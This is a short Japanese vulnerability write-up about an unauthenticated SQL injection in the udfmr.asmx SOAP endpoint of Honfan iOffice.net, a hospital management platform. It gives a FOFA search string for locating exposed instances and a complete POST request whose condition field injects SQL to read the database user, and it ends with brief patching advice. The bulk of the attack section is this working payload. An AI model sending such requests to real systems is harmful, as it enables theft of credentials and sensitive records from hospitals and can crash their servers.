0x01 製品紹介
Honfan iOffice.net は、病院の管理事務ニーズ (従来の OA) を最初に満たし、現在では保健当局の管理規定と多くの業界固有のアプリケーションを統合しており、現在、病院の総合経営管理を解決します 業界特性を備えた病院総合経営管理プラットフォームは、最も多くの実績を誇る病院総合経営管理ソフトウェアです。
0x02 脆弱性の概要
Honfan iOffice.net の udfmr.asmx インターフェイスには SQL インジェクションの脆弱性があり、認証されていない攻撃者がこの脆弱性を利用してデータベースの機密情報や資格情報を取得し、最終的にはサーバーがクラッシュする可能性があります。
0x03 再発環境
FOFA: app="Hongfan-ioffice"
0x04 脆弱性の再発
http://your-ip/iOffice/prg/set/wss/udfmr.asmx?op=GetEmpSearch
この場合、抜け穴がある可能性があります
実証実験
POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
<condition>1=user_name()</condition>
</GetEmpSearch>
</soap:Body>
</soap:Envelope>
現在のデータベース ユーザーを照会します
0x05 修復の提案
アクセス元アドレスを制限し、必要な場合以外はシステムをインターネットに公開しないでください。
安全なバージョンにアップグレードするか、パッチを適用してください。